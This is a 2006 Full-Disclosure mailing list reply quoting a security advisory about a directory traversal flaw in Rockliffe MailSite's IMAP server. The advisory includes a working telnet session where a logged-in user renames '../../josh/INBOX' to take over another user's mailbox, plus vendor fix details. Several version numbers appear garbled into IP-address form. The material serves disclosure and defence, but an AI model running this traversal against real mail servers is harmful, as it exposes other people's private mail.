[Full-disclosure] Rockliffe Directory Transversal Vulnerability
stan.bubrouski at gmail.com
Wed Jan 4 17:03:40 GMT 2006
Seeing as most IMAP servers allow you to use ../../ with SELECT, etc..
(think uw-imapd for example) I think I would categorize this as more
of a permissions problem.
On 1/4/06, Josh Zlatin <jzlatin at ramat.cc> wrote:
> Synopsis: Rockliffe's Mailsite Imap Directory Transversal Vulnerability.
> Product: Rockliffe Mailsite
> Version: Confirmed on Mailsite < 18.104.22.168
> Author: Josh Zlatin-Amishav
> Date: January 4, 2006
> Rockliffe MailSite secure email server software and MailSite MP secure email
> gateways provide email server solutions and gateway email protection for
> businesses and service providers. Rockliffe has more than 3,000 customers
> hosting more than 15 million mailboxes worldwide.
> In working with researchers at Tenable Network Security, I have come across
> a directory transversal flaw in the IMAP server. It is possible for an
> authenticated user to access any user's inbox via a RENAME command.
> josh at lab1:~$ telnet 10.0.0.5 143
> Trying 10.0.0.5...
> Connected to 10.0.0.5.
> Escape character is '^]'.
> * OK MailSite IMAP4 Server 22.214.171.124 ready
> a1 login joe pass
> a1 OK LOGIN completed
> a2 rename ../../josh/INBOX gotcha
> a2 OK RENAME folder ../../josh/INBOX renamed to gotcha
> a3 select gotcha
> * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
> * 0 EXISTS
> * 0 RECENT
> * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
> * OK [UNSEEN 0]
> * OK [UIDVALIDITY 514563061] UIDs are valid
> a3 OK [READ-WRITE] opened gotcha
> user joe can now access the contents of user josh's INBOX directory.
> Vendor notified: January 3, 2006 06:12AM
> Vendor Response:
> Contact your sales rep about purchasing Mailsite 126.96.36.199
> Mailsite fixed a buffer overun in the Mailsite IMAP server which also fixes
> the directory transversal problem. Either upgrade to version 6.1.22 and install
> the hotfix (i.e. upgrade to 188.8.131.52), or install the latest version of
> Mailsite. The hotfix can be obtained at:
> References: http://www.rockliffe.com
> References: http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
Full-Disclosure is hosted and sponsored by Secunia.